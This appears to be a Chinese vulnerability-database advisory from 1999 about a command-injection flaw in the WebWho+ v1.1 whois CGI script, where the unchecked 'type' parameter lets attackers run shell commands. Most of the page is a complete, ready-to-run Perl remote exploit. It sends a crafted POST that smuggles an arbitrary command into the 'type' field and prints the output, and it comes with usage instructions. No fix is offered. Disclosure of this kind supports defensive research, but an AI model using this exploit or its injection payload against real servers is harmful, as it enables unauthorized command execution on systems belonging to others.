发布日期：1999-12-30
更新日期：1999-12-30

受影响系统：

WebWho+ v1.1

描述：

---

    WebWho+（<http://www.webscripts.org/）对其'command'命令参数检查shell特殊操作符，但没有对'type'(TLD)命令参数进行检查。攻击者利用此漏洞可以WebWho运行者权限（通常为nobody）执行任意命令。




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
#
# hhp-webwho.pl
# WebWho+ v1.1 (whois cgi) remote exploit.
#
# By: loophole of hhp.
# [12/26/99]
#
# http://hhp.perlx.com/
# loophole@hhp.perlx.com
#
# Advisrory: http://hhp.perlx.com/ouradvisories/hhp-webwho.txt

use IO::Socket;

if (@ARGV < 2)
{
print "* hhp-webwho.pl\n";
print "* webwho.pl (whois cgi) remote exploit.\n";
print "* By: loophole of hhp.\n";
print "* loophole\@hhp.perlx.com\n";
print "* http://hhp.perlx.com/\n\n";
print "USAGE: $0 <Server> [-e <File Extention>] <Command>\n\n";
print "* Server      = www.example.com\n";
print "* File Extension = /cgi-bin/webwho.pl\n";
print "* Command     = Shell command\n\n";
print "* NOTE: Defualt <File Extension> is /cgi-bin/webwho.pl\n";
print "*     It only needs changing if it is not the defualt.\n\n";
print "* EXAMPLE: $0 www.gat.org id\n";
print "*    OR: $0 www.gat.org -e /jack/webwho.pl id\n";
exit 0;
}

if ($ARGV[1] eq "-e")
{
if (@ARGV != 4)
  {
   print "Invalid Usage!\n";
   exit 0;
  }
$server   = $ARGV[0];
$saywhatnig = $ARGV[2];
$command   = $ARGV[3];
}
else
  {
   if (@ARGV == 2)
   {
    $server   = $ARGV[0];
    $command   = $ARGV[1];
    $saywhatnig = "/cgi-bin/webwho.pl";
   }
  }

$sock = IO::Socket::INET->new(PeerAddr => $server,
                    PeerPort => 80,
                      Proto => "tcp") or die "Wack connection.\n";

$calkuhlashun = 45 + length($command);

print $sock "POST $saywhatnig HTTP/1.1\n";
print $sock "Accept-Language: en-us\n";
print $sock "Host: $server\n";
print $sock "Content-Length: $calkuhlashun\n";
print $sock "Connection: Keep-Alive\n\n";
print $sock 'command=X&type=";echo fukk;';
print $sock "$command";
print $sock ";echo fokk&Check=X\n";
$doot = 0;

while(<$sock>)
  {
   s/\n//g;
   s/fukk<br>/--------Exploit Stats------------/;
   s/fokk<br>/-hhpfoelife-\n/;
   s/<br>//g;
   $foo = $_;

   if ($foo =~ /---Ex/)
    {
     $doot = 1;
    }

   if ($foo =~ /-hhpfoelife-/)
    {
     $doot = 0;
     print "---------------------------------\n";
     exit 0;
    }

   if ($doot == 1)
    {
     print "$foo\n";
    }
  }
exit 0;




建议：

---

    暂无。




浏览次数：7224
严重程度：0（网友投票）